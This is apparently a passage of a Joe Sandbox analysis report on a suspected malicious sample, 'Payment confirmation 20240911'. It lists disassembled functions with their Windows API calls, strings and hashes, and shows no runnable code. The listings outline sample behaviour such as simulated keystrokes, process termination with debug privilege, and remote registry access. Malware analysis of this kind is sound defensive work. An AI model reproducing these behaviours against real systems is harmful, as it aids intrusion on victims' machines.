                                          • Instruction ID: 4bcdc2c91d1ff9dfeab9a3f48661ba1881a7baf78e92fdf4fb2affeed4ff34e9
                                          • Opcode Fuzzy Hash: 93949ce82d7c0592a930bf2c215812f3b3d9f20cc8916a3b4cb0a8fd65a6f253
                                          • Instruction Fuzzy Hash: 2381DC31514242ABD710EF68CC58F6BBBE8EBD4718F50462DF6558B290DB71D904CB92
                                          Function 012FA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32 ref: 0135E9EA
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0135EA0B
                                          • LoadImageW.USER32 ref: 0135EA20
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0135EA3D
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0135EA64
                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,012FA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0135EA6F
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0135EA8C
                                          • DestroyIcon.USER32(00000000,?,?,?,?,?,?,012FA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0135EA97
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                          • String ID:
                                          • API String ID: 1268354404-0
                                          • Opcode ID: 0aea748376878a89982672dce8ea952337182ce67a0c6bbd5a990815ee8e14e5
                                          • Instruction ID: 559ac6fb58ac6c2ca59155f6eae9b6f437aa496b9d07e027909112ef177130f2
                                          • Opcode Fuzzy Hash: 0aea748376878a89982672dce8ea952337182ce67a0c6bbd5a990815ee8e14e5
                                          • Instruction Fuzzy Hash: 64515E74610205EFEF21DF68C885FAABBF9BB48754F10462DFA5A97290D7B0E940CB50
                                          Function 012FF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShowWindow.USER32(00000000,000000FF), ref: 012FF737
                                          • ShowWindow.USER32(00000000,00000000), ref: 012FF77E
                                          • ShowWindow.USER32(00000000,00000006), ref: 0135EB55
                                          • ShowWindow.USER32(00000000,000000FF), ref: 0135EBC1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: 44df622400a04e109c5c68f47137c2b531dd4c23bcbd4259b357111fc508fc38
                                          • Instruction ID: 6f799ca0890a22eed1ce0622720e4aeab12046b569d8f4cc203297bef1b47765
                                          • Opcode Fuzzy Hash: 44df622400a04e109c5c68f47137c2b531dd4c23bcbd4259b357111fc508fc38
                                          • Instruction Fuzzy Hash: 9F412B33238682DBEB7D463C8AC8E36FE9A6B45316F58483DE787C2565C6B0A440C721
                                          Function 0131CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0131E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0131E158
                                            • Part of subcall function 0131E138: GetCurrentThreadId.KERNEL32(00000000,?,0131CDFB,?,00000001), ref: 0131E15F
                                            • Part of subcall function 0131E138: AttachThreadInput.USER32(00000000,?,0131CDFB), ref: 0131E166
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0131CE06
                                          • PostMessageW.USER32 ref: 0131CE23
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0131CE26
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0131CE2F
                                          • PostMessageW.USER32 ref: 0131CE4D
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0131CE50
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0131CE59
                                          • PostMessageW.USER32 ref: 0131CE70
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0131CE73
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: 1c7f4ee689c31b43f67746e12560d7589ee5ab6057ec84e85cc2c8a756f35e76
                                          • Instruction ID: 65616fdaaf284f0ac48f2f11a8d5d234cded521efc0e54368b98ffc6a6e6a987
                                          • Opcode Fuzzy Hash: 1c7f4ee689c31b43f67746e12560d7589ee5ab6057ec84e85cc2c8a756f35e76
                                          • Instruction Fuzzy Hash: 6811E1B1650618BEF7212BA48C8DF6A7A2DDB0C765F500415F2806B0E4C9F26C008BB4
                                          Function 0133C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: 33310474df0229318376e6cb67b195f7de80ea8c1f5b3ada70b0c766623eac6f
                                          • Instruction ID: bb9d0a6965b916c182bf4c5fdbe4718815dd1ba2e863a19b37fd9907c58925c6
                                          • Opcode Fuzzy Hash: 33310474df0229318376e6cb67b195f7de80ea8c1f5b3ada70b0c766623eac6f
                                          • Instruction Fuzzy Hash: F2E1C671A0021AAFDF15DFA8C894BEE77B9FF88358F14802AE945B7281D7709D41CB94
                                          Function 01349882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01349926
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0134993A
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01349954
                                          • _wcscat.LIBCMT ref: 013499AF
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 013499C6
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 013499F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: a32334edc730aacc6a2cabbb8474b1f3c2970dc7d28e79fe07ee6c156285043c
                                          • Instruction ID: 245288475a4b316e65fc4797f515debdcc068f6dc93af7ff56b1d78c6aeef4c6
                                          • Opcode Fuzzy Hash: a32334edc730aacc6a2cabbb8474b1f3c2970dc7d28e79fe07ee6c156285043c
                                          • Instruction Fuzzy Hash: 9D41A871A00349EFEF219FA8C885FEF7BE8EF08358F10452AF555A7291D671A9848B50
                                          Function 01341620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01326F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01326F7D
                                            • Part of subcall function 01326F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 01326F8D
                                            • Part of subcall function 01326F5B: CloseHandle.KERNEL32(00000000), ref: 01327022
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0134168B
                                          • GetLastError.KERNEL32 ref: 0134169E
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 013416CA
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 01341746
                                          • GetLastError.KERNEL32(00000000), ref: 01341751
                                          • CloseHandle.KERNEL32(00000000), ref: 01341786
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: f90a635a475b06041be95a0d43f8a0e529506f786efeb7605ec4ba1c47aaca8e
                                          • Instruction ID: da57f7af74b24d80be7527556484d3d83125badf299d48a800c1bcb855cc8ad9
                                          • Opcode Fuzzy Hash: f90a635a475b06041be95a0d43f8a0e529506f786efeb7605ec4ba1c47aaca8e
                                          • Instruction Fuzzy Hash: 6F41C371700206AFDB15EF98C8E4F7DBBE5AF58318F048059EA069F291DBB5E844CB90
                                          Function 01349D97 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                          • String ID: 0$`"u
                                          • API String ID: 3866635326-2270789441
                                          • Opcode ID: 7f1ee1873f85bdb7c3c9be7b8c2e8a63aa11cba20966957cd72b1ff77dca3606
                                          • Instruction ID: 5da128d12ec53b5b7be2bdfa30727bcda04dd3b57e67d9f41bf4c322c54e73bf
                                          • Opcode Fuzzy Hash: 7f1ee1873f85bdb7c3c9be7b8c2e8a63aa11cba20966957cd72b1ff77dca3606
                                          • Instruction Fuzzy Hash: 5B412975A0020AEFEB20DF94D484F9A7BF8FF09358F048119EA5997251D730F994DB50
                                          Function 01326237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 6d3ae08f5d169e4d1d822d6adc59d6905ac8db285c73684de71cdf2c17b84c3c
                                          • Instruction ID: fca3802f1a03768cff25d29f816da0d5e5df74fe53ce47e2b8a8d8255f0f058d
                                          • Opcode Fuzzy Hash: 6d3ae08f5d169e4d1d822d6adc59d6905ac8db285c73684de71cdf2c17b84c3c
                                          • Instruction Fuzzy Hash: BA11D0B53087577AE7066A599C93D6E77DCAF1773CB10002DFD0166682EBB0A9404664
                                          Function 0132757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 01327595
                                          • LoadStringW.USER32(00000000), ref: 0132759C
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 013275B2
                                          • LoadStringW.USER32(00000000), ref: 013275B9
                                          • _wprintf.LIBCMT ref: 013275DF
                                          • MessageBoxW.USER32 ref: 013275FD
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 013275DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: de978c1bcc214f030fdded03166160a656e120a72236456805382fddb78d029c
                                          • Instruction ID: c3bcd79003754fd93fdadf9936141abb1c795fa46f646d08b0f36e63cd04df96
                                          • Opcode Fuzzy Hash: de978c1bcc214f030fdded03166160a656e120a72236456805382fddb78d029c
                                          • Instruction Fuzzy Hash: 3F016DF2A00208FFEB21A7E49C89EE7776CEB08304F004495F746E2045EAB49E848B75
                                          Function 01342A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                            • Part of subcall function 01343AF7: CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01342AE7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharConnectRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3479070676-0
                                          • Opcode ID: bfdf0aafae8e76dbe4e1a941747b71c6722246ade3961d7e57f5c7f554fa58cc
                                          • Instruction ID: 1a897225a38383e7345f0b37dbf061696da531f52cc473260697bfc999b89576
                                          • Opcode Fuzzy Hash: bfdf0aafae8e76dbe4e1a941747b71c6722246ade3961d7e57f5c7f554fa58cc
                                          • Instruction Fuzzy Hash: 5A917C712142069FCB14EF98D894B6EB7E5FF98318F04881DFA96972A0DB34E945CF42
                                          Function 0130B72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __mtinitlocknum.LIBCMT ref: 0130B744
                                            • Part of subcall function 01308A0C: __FF_MSGBANNER.LIBCMT ref: 01308A21
                                            • Part of subcall function 01308A0C: __NMSG_WRITE.LIBCMT ref: 01308A28
                                            • Part of subcall function 01308A0C: __malloc_crt.LIBCMT ref: 01308A48
                                          • __lock.LIBCMT ref: 0130B757
                                          • __lock.LIBCMT ref: 0130B7A3
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,01396948,00000018,01316C2B,?,00000000,00000109), ref: 0130B7BF
                                          • EnterCriticalSection.KERNEL32(8000000C,01396948,00000018,01316C2B,?,00000000,00000109), ref: 0130B7DC
                                          • LeaveCriticalSection.KERNEL32(8000000C), ref: 0130B7EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                          • String ID:
                                          • API String ID: 1422805418-0
                                          • Opcode ID: 73c513afbc1483acec1bb2ff12fe02b46dd067e16b2c798be4704e99599187c3
                                          • Instruction ID: ec852d557745c1cad7601103fe8fc4c0c93b94350aeead7e5ade9b2fdaa7b1b9
                                          • Opcode Fuzzy Hash: 73c513afbc1483acec1bb2ff12fe02b46dd067e16b2c798be4704e99599187c3
                                          • Instruction Fuzzy Hash: DC412775E002568FEB269F6CD864768FBE4BF0073DF14821CE425AB2E5C7749500CB94
                                          Function 0132A1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0132A1CE
                                            • Part of subcall function 0130010A: std::exception::exception.LIBCMT ref: 0130013E
                                            • Part of subcall function 0130010A: __CxxThrowException@8.LIBCMT ref: 01300153
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0132A205
                                          • EnterCriticalSection.KERNEL32(?), ref: 0132A221
                                          • _memmove.LIBCMT ref: 0132A26F
                                          • _memmove.LIBCMT ref: 0132A28C
                                          • LeaveCriticalSection.KERNEL32(?), ref: 0132A29B
                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0132A2B0
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0132A2CF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 256516436-0
                                          • Opcode ID: ca0f6517fea5db24300e15ac770f02bf889fe9105ec08765de847e7c1e2ace6e
                                          • Instruction ID: 8baeee38ed514113b0d634707af218a52fc06a3acdc54150fd85e34552e11edd
                                          • Opcode Fuzzy Hash: ca0f6517fea5db24300e15ac770f02bf889fe9105ec08765de847e7c1e2ace6e
                                          • Instruction Fuzzy Hash: 1131C431A00215EFCF15EF98DD85EAEB7B8FF45714F1480A5E904AB246D770D914CB60
                                          Function 01348CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 01348CF3
                                          • GetDC.USER32(00000000), ref: 01348CFB
                                          • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0134BB29,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 01348D06
                                          • ReleaseDC.USER32(00000000,00000000), ref: 01348D12
                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 01348D4E
                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01348D5F
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01348D99
                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01348DB9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                          • String ID:
                                          • API String ID: 3864802216-0
                                          • Opcode ID: 63de0adc16524ca26f17d117596d8a73694d94e8beaa3e410647ca23d6c9a25a
                                          • Instruction ID: 0d3b9a9b492caae908a44b35cf3bf9ca302fc938e9b44c110d2a06c185ad4ada
                                          • Opcode Fuzzy Hash: 63de0adc16524ca26f17d117596d8a73694d94e8beaa3e410647ca23d6c9a25a
                                          • Instruction Fuzzy Hash: 26318B72201210BBEB218F94CC89FEA3FADEF4A765F048055FE889A195C6B59841CB70
                                          Function 01331BFA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                          • _wcstok.LIBCMT ref: 01331D6E
                                          • _wcscpy.LIBCMT ref: 01331DFD
                                          • _memset.LIBCMT ref: 01331E30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                          • String ID: X
                                          • API String ID: 774024439-3081909835
                                          • Opcode ID: e026578b4f93f90202701ea51f52fc21fd826f7460a5e49262da02e76f874ee6
                                          • Instruction ID: 5eaa938b03ac8a0b675425edeffbd4cca5732dabcf2ec14c09628426d8d56ccc
                                          • Opcode Fuzzy Hash: e026578b4f93f90202701ea51f52fc21fd826f7460a5e49262da02e76f874ee6
                                          • Instruction Fuzzy Hash: 76C182355183019FC724EF68C894A6BB7E4FFA5314F40492DE99A973A0EB31ED05CB92
                                          Function 012FB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 683f6436cabf3380b7e715f7514679dc5ef7df09cd1d9925a2f68f6d80ae90d7
